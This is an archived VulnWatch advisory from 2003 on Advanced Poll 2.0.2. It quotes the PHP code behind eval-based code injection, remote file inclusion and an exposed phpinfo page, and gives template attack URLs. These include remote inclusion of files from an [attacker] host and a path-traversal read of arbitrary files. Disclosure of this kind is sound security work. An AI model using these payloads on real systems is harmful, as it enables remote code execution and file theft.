[VulnWatch] Advanced Poll : PHP Code Injection, File Include, Phpinfo

• Previous message: NGSSoftware Insight Security Research: "[VulnWatch] Microsoft PCHealth 2003/XP Buffer Overflow (#NISR15102003)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Informations :
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

comments.php :

------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {
    if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = 
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
    } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = 
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
    } else {
        eval("\$$register_poll_vars[$i] = '';");
    }
}
[...]
------------------------------------------------------------------------------------------------------



booth.php, png.php :

---------------------------------------------------------------
<?php

$include_path = dirname(__FILE__);
if ($include_path == "/") {
    $include_path = ".";
}

if (!isset($PHP_SELF)) {
    global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
}

require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------


poll_ssi.php, popup.php :

----------------------
include "./booth.php";
----------------------




admin/common.inc.php :

---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
}

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
    include ("$base_path/lang/$pollvars[lang]");
} else {
    include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------


In the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

:

------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);

require "./common.inc.php";
[...]
------------------------------------


misc/info.php :

-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------


Exploits :
°°°°°°°°

- if magic_quotes_gpc=OFF :

http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//

or with a POST form or cookies.

- This will only work if register_globals=OFF (this is not an error...) :

http://[target]/booth.php?include_path=http://[attacker] (or with png.php, 
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This will work if register_globals=OFF OR ON :

http://[target]/admin/common.inc.php?basepath=http://[attacker] will include 
the file http://[attacker]/lang/english.php.

The same hole can be found, in the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url 
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view 
will include the file http://[target]/admin/../../../file/to/view


- http://[target]/misc/info.php will show the phpinfo().


Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .


Credits :
°°°°°°°°
frog-m@n
http://www.phpsecure.info

_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail

• Next message: dong-h0un U: "[VulnWatch] sh-httpd `wildcard character' vulnerability"
• Previous message: NGSSoftware Insight Security Research: "[VulnWatch] Microsoft PCHealth 2003/XP Buffer Overflow (#NISR15102003)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Oct 25 2003 - 11:03:18 PDT